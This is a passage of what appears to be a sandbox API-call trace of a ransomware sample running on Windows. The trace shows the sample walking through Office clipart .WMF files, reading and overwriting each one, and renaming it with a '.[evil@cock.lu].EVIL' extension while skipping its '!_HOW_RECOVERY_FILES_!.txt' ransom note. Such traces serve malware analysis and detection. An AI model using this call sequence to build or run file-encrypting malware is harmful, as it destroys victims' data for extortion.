dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.132] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1138, lpOverlapped=0x0) returned 1 [0113.152] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.152] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.153] _errno () returned 0x84b1160840 [0113.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0113.153] CloseHandle (hObject=0x1a8) returned 1 [0113.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.153] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.153] __uncaught_exception () returned 0x84b1160800 [0113.153] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf.[evil@cock.lu].evil")) returned 1 [0113.154] ??_V@YAXPEAX@Z () returned 0x1 [0113.158] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF", dwFileAttributes=0x200) returned 0 [0113.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.158] wcsstr (_Str="BL00923_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.159] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 69 [0113.159] wcscmp (_String1="BL00923_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.159] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00923_.WMF") returned 0x0 [0113.159] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 0x45 [0113.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1870, lpOverlapped=0x0) returned 1 [0113.172] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.172] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.172] _errno () returned 0x84b1160840 [0113.172] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.172] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1880, lpOverlapped=0x0) returned 1 [0113.172] CloseHandle (hObject=0x1a8) returned 1 [0113.172] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.172] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.172] __uncaught_exception () returned 0x84b1160800 [0113.172] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.173] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf.[evil@cock.lu].evil")) returned 1 [0113.173] ??_V@YAXPEAX@Z () returned 0x1 [0113.177] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF", dwFileAttributes=0x200) returned 0 [0113.177] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.177] wcsstr (_Str="BL00932_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.177] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 69 [0113.177] wcscmp (_String1="BL00932_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.177] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00932_.WMF") returned 0x0 [0113.177] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 0x45 [0113.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.180] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4c14, lpOverlapped=0x0) returned 1 [0113.193] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.193] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.193] _errno () returned 0x84b1160840 [0113.193] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.193] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c20, lpOverlapped=0x0) returned 1 [0113.193] CloseHandle (hObject=0x1a8) returned 1 [0113.193] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.194] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.194] __uncaught_exception () returned 0x84b1160800 [0113.194] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.194] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf.[evil@cock.lu].evil")) returned 1 [0113.195] ??_V@YAXPEAX@Z () returned 0x1 [0113.198] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF", dwFileAttributes=0x200) returned 0 [0113.198] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.198] wcsstr (_Str="BL00985_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.198] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 69 [0113.198] wcscmp (_String1="BL00985_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.198] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BL00985_.WMF") returned 0x0 [0113.198] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 0x45 [0113.198] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.200] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xeb8, lpOverlapped=0x0) returned 1 [0113.208] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.208] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.208] _errno () returned 0x84b1160840 [0113.208] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.208] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0113.208] CloseHandle (hObject=0x1a8) returned 1 [0113.208] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.209] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.209] __uncaught_exception () returned 0x84b1160800 [0113.209] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.209] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf.[evil@cock.lu].evil")) returned 1 [0113.210] ??_V@YAXPEAX@Z () returned 0x1 [0113.212] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF", dwFileAttributes=0x200) returned 0 [0113.212] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.212] wcsstr (_Str="BOAT.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.212] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 65 [0113.212] wcscmp (_String1="BOAT.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.212] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BOAT.WMF") returned 0x0 [0113.212] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 0x41 [0113.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.214] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd16, lpOverlapped=0x0) returned 1 [0113.221] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.221] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.221] _errno () returned 0x84b1160840 [0113.221] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.221] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0113.221] CloseHandle (hObject=0x1a8) returned 1 [0113.221] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.222] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.222] __uncaught_exception () returned 0x84b1160800 [0113.222] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.222] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf.[evil@cock.lu].evil")) returned 1 [0113.229] ??_V@YAXPEAX@Z () returned 0x1 [0113.231] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF", dwFileAttributes=0x200) returned 0 [0113.232] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.232] wcsstr (_Str="BOATINST.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.232] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 69 [0113.232] wcscmp (_String1="BOATINST.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.232] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BOATINST.WMF") returned 0x0 [0113.232] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 0x45 [0113.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.234] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x714c, lpOverlapped=0x0) returned 1 [0113.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.246] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.246] _errno () returned 0x84b1160840 [0113.246] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.246] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x7160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7160, lpOverlapped=0x0) returned 1 [0113.246] CloseHandle (hObject=0x1a8) returned 1 [0113.246] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.247] __uncaught_exception () returned 0x84b1160800 [0113.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.247] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf.[evil@cock.lu].evil")) returned 1 [0113.247] ??_V@YAXPEAX@Z () returned 0x1 [0113.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF", dwFileAttributes=0x200) returned 0 [0113.250] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.250] wcsstr (_Str="BS00076_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.250] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 69 [0113.250] wcscmp (_String1="BS00076_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.250] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00076_.WMF") returned 0x0 [0113.250] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 0x45 [0113.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.252] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x532, lpOverlapped=0x0) returned 1 [0113.268] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.268] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.268] _errno () returned 0x84b1160840 [0113.268] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.268] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0113.268] CloseHandle (hObject=0x1a8) returned 1 [0113.268] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.268] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.268] __uncaught_exception () returned 0x84b1160800 [0113.268] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.268] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf.[evil@cock.lu].evil")) returned 1 [0113.269] ??_V@YAXPEAX@Z () returned 0x1 [0113.272] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF", dwFileAttributes=0x200) returned 0 [0113.272] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.272] wcsstr (_Str="BS00078_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.272] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 69 [0113.272] wcscmp (_String1="BS00078_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.272] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00078_.WMF") returned 0x0 [0113.272] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 0x45 [0113.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.274] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5a4, lpOverlapped=0x0) returned 1 [0113.280] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.280] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.280] _errno () returned 0x84b1160840 [0113.280] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.280] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0113.280] CloseHandle (hObject=0x1a8) returned 1 [0113.280] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.281] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.281] __uncaught_exception () returned 0x84b1160800 [0113.281] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf.[evil@cock.lu].evil")) returned 1 [0113.281] ??_V@YAXPEAX@Z () returned 0x1 [0113.284] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF", dwFileAttributes=0x200) returned 0 [0113.284] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.284] wcsstr (_Str="BS00092_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.284] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 69 [0113.284] wcscmp (_String1="BS00092_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.284] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00092_.WMF") returned 0x0 [0113.284] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 0x45 [0113.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.286] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f26, lpOverlapped=0x0) returned 1 [0113.300] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.300] 